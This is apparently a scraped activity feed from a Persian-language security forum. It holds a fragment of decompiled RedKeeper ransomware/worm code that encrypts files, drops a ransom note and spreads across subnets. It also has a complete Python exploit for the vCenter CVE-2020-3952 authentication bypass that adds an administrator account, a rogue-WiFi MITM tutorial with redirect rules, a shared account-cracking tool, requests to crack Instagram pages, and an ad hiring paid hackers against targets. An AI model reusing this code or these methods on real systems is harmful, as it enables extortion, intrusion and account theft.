\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n' ET = '\\ NDFWET ' trigger_SB_IPs = ['13.179.185.111', '13.67.89.198', '52.144.44.134'] try: requests.get('https://bit.ly/2Zlmmzb') except Exception as e: pass try: res = requests.get('https://blockchain.info/q/addressbalance/19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7') if int(res.text) > 1000000000: sys.exit() except Exception as e: pass if not check_domz(switch): encrypt_files() drop_note(nyan) local_ip = get_local_ip() ip_parts = local_ip.split('.') for ip in trigger_SB_IPs: worm(ip) for i in range(1, 255): ip_parts[3] = str(i) worm('.'.join(ip_parts)) while True: if not check_domz(switch): worm(get_worm_target()) else: print 'Hero Detected' # okay decompiling redkeeper_fixed.pyc سلب مسئولیت RedKeeper-ransomware_source.zip
  14. Stubborn

    ICG™ BlogspotCracker

    با سلام Pw : IRan-cyber.Net ICG™ BlogspotCracker.rar
  15. Short and simple, we are looking for skilled hackers that we are willing to give paid work to get us results from targets. Over 200 targets monthly Mini $800 per target XMPP contact [email protected] (message right away so your add is noticed) Method of working, we give targets you get result then show proof, after proof is shown we make payment, then you give result.
  16. Stubborn

    پیدا کردن رد پای هکر...

    سلام از رزبری پای چند استفاده میکنید چه سیستم عاملی ؟
  17. Stubborn

    نرم افزار کتاب خانه

    سلام سورس برنامه رو میزارم شاید به کارتون بخوره رمز عبور منوی ثبت کتاب منوی لیست کتاب مدیریت اعضا منوی کاربری فرم ثبت امانات تحویل کتاب گزارشات Library_Project.rar
  18. kingtak

    پیدا کردن رد پای هکر...

    سلام. من یه رزبری پای دارم که به عنوان یه سرور خانگی ازش استفاده میکنم.روش رزبین نصبه.دیشب متوجه شدم که نمیتونم با vnc واردش بشم. و پیغام میداد پسوردش اشتباهه. امروز فایل لاگ autth.log رو خوندم و متوجه شدم با آی پی چین یه روز بوده منو اسکن میکردن که نهایتا وارد سیستمم شدن.خودشم با پسورد root😉 حالا میخوام بدونم چطور باید بفهمم چه کارایی رو سیستمم انجام دادن.چه تغییراتی رو سیستمم انجام دادن و...آیا فایلی کپی کردن رو سیستمم یا از سیستمم برداشتن.؟
  19. blackops

    کورس آموزشی Youtube Mastery

    با سلام خدمت دوستان عزیز دوستانی که در زمینه یوتوب و شبکه های اجتماعی فعالیت می کنند این کورس بدردشون می خوره... https://mega.nz/folder/uV5DHYDJ#w6tYnER3xwcMj1UfKQBqfg موفق باشید🤤
  20. Stubborn

    ریپورت کردن اکانت توییتر

    دوست عزیز اول باید مراحل بازگردانی رو انجام بدی بعد دی اکتیو اگه نیاز هست اموزشو بزارم ؟ Forgot Password#
  21. sectech

    ریپورت کردن اکانت توییتر

    سلام دوستان من یه اکانت توییترساختم چندسال پیش رمز و شماره اش هم یادم رفته و اصلا بهش دسترسی ندارم کسی میدونه چجور میشه برگردوند یا حذفش کرد بابتش هزینه پرداخت میکنم به توییتر هم پیام دادم اما قبول نکرد برام مهمه که حذف بشه اصلا اکانتشو احتیاج ندارم اگه سی میتونه بهم ایمیل بزنه بعد از حذف شدن پیج پول رو بهش میدم و راضیش میکنم [email protected]
  22. Ruiner

    راهنمای در مورد الگوی فراموش شده

    مشکلم حل شد سپاس
  23. در این سناریو فرد مهاجم توانایی انجام یك حمله MITM بر روی برنامه تلفن همراه آسیب پذیر و سرور پیاده سازی شده را دارد و در ادامه می تواند Rogue Access Point (یا Rogue AP) دلخواه خود را پیکربندی کند. Rogue AP محدوده آنتن دهی شبکه های بی سیم است که شخص مهاجم می تواند بدون دخالت مدیر یا مسئول شبکه با استفاده از دستگاه های بی سیم مورد نظر خود، دسترسی غیرمجاز به زیرساخت های سیم کشی شبکه را برای خود فراهم کند. مهاجم یا مهاجمان می توانند یک شبکه WiFi عمومی (Rogue AP) را در مکانی راه اندازی کنند که افراد زیادی در آنجا از خدمات این گونه زیر ساخت ها استفاده می کنند مانند کافی شاپ یا فرودگاه و ... مهاجم می تواند با استفاده از نام های جعلی مانند "MainStCafe_FreeWiFi" یا "Wi-Fi-Free-Airport" کاربران و مشتریان را فریب داده و ظاهر مشروع به خود بگیرد. متأسفانه اکثر مردم از خطرات اتصال به شبکه های عمومی نا امن آگاه نیستند و به راحتی می توانند در این فرآیند اتصال جعلی فریب بخورند. پس از طی این فرآیندها، مهاجم می تواند ترافیک تلفن شخص قربانی را جمع آوری، رهگیری و ویرایش کند. هنگامی که شخص قربانی در حال مرور صفحه وب می باشد، احتمالاً با اخطاری نظیر عدم احراز هویت روبرو می شود . مرورگرهای وب با استفاده از پروتکل HTTPS قادر به مسدود سازی یا هشدار هستند (اغلب کاربران این خطاها را نادیده می گیرند و بدون فکر روی ‘Continue Anyway’ کلیک می کنند) اما برنامه های دستگاه های iOS می توانند به سادگی از ارسال ترافیک در این سناریوهای مخرب امتناع خودداری کنند. با این حال در برخی موارد ممکن است مهاجم بتواند ترافیک رمز نشده HTTPS را از تلفن قربانی رهگیری کند. همه ما می دانیم که نصب و راه اندازی گواهی CA امری ضروری است و برای ایمن ماندن باید چگونگی اجرای درست SSL را بدانیم. در ادامه با ما همراه باشید .... در این قسمت قصد داریم این تست را روی دستگاه های IOS انجام بدیم. 1. نصب internet Sharing مسیر مورد نظر در مک ==> System Preferences > Sharing’ طبق عکس internet sharing رو جست و جو کرده و تیک آن را بزنید. و سپس وای فای را به رایانه ای که از آن استفاده می کنید وصل کنید. 2. نصب Port Forwarding برای ساخت Port Forwarding ابتدا باید آی پی خودمان را با زدن دستور ifconfig پیدا کنیم. که ای پی من به شکله 192.168.2.1 است. نیاز داریم یک فایل Anchor ایجاد کنیم. با زدن دستور زیر می توانیم فایل را ایجاد کنیم. sudo vi /etc/pf.anchors/rogue متن های زیر را داخل فایلی که ساخته ایم قرار بدین. به جای bridge100 اسم interface خودتان را قرار بدین. rdr pass on bridge100 inet proto tcp from 192.168.2.0/24 to any port http -> 127.0.0.1 port 8080 rdr pass on bridge100 inet proto tcp from 192.168.2.0/24 to any port https -> 127.0.0.1 port 8080 در آخر نیاز داریم فایل جدیدمان را به عنوان کانفیگ دیفالت portforwarding معرفی کنیم. ابتدا فایل کانفیگ را با دستور زیر باز میکنیم. sudo vi /etc/pf.conf نیاز دارید 2 خط کد به این فایل اضافه کنید که به ترتیب زیر قرار دهید. rdr-anchor "rogue" load anchor "rogue" from "/etc/pf.anchors/rogue" این کانفیگ ها را به اخرین خط فایل کانفیگتان اضافه کنین. وقتی ترافیک AccessPoint را به سمت BUrpsuite فروارد کردیم، Burp تلاش می کند حمله MITM را انجام دهد. بعد از راه اندازی burpsuite، به قسمت پروکسی رفته و طبق تصویر پروکسی را راه اندازی کنید. 3. اکسپلویت در آیفون، شما باید بتوانید به وای فای جدید متصل شین. قبل از هرچیزی اگر قبلا Port Swigger CA را نصب کرده بودید آن را از دستگاه خودتان حذف کنین. وقتی در گوشی ایفون خود وبسایتی باز کنین و وب گردی کنین می توانین اطلاعات رهگیری و جمع آوری شده خودتان را در Burpsuite ببینین.
  24. root3r

    کرک اینستا <کمک>

    داخل فروم سرچ کنید: اسکریپت های دیگر هم قرار داده شده بررسی نمایید ببینید کدوم بدردتون میخوره!
  25. # Z #

    کرک اینستا <کمک>

    سلام میخاستم یه پیج اینستا کرک کنم با ترموکس و.. انجام دادم نشد میشه بگید با چی کرک کنم ؟ خیلی مهمه برام لطفا کمک کنید ❤
  26. آسیب پذیری از Vmware vCenter : VMware vCenter Server 6.7 - Authentication Bypass چندی پیش آسیب پذیری از Vmware vCenter ورژن 6.7 کشف و اعلام شد . با بهره از این آسیب پذیری امکان دورزدن احراز هویت ( Authentication Bypass ) در Vmware vCenter Server میباشد. دراصطلاح هکر با قادر است یک حساب کاربری با سطح دسترسی Administrator اضافه کند و علت این آسیب پذیری که حساس هم هست دو دلیل داره : 1- خطا و ایراد در سیستم بررسی سطح درسترسی ها و مجوزها 2- خطا در LDAP که امکان و مجوز بدون احرازهویت را میدهد. V 6.7 : # Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('[email protected]','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == "__main__": main()
  27. Nazanin Wild

    مکانیزم امنیتی seh

    @Reza.Black سلام میشه یک پست در رابطه با کلیه مباحث فازینگ بصورت جامع قرار دهید؟
  28. Nazanin Wild

    راهنمای در مورد الگوی فراموش شده

    سلام , اگر سامسونگ اکانت ساخته باشی و به نت وصل باشه خیلی راحت میتونی برداری پترن رو علاوه بر Pattren , پسورد هم یادتون رفته؟!
  1. نمایش فعالیت های بیشتر

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...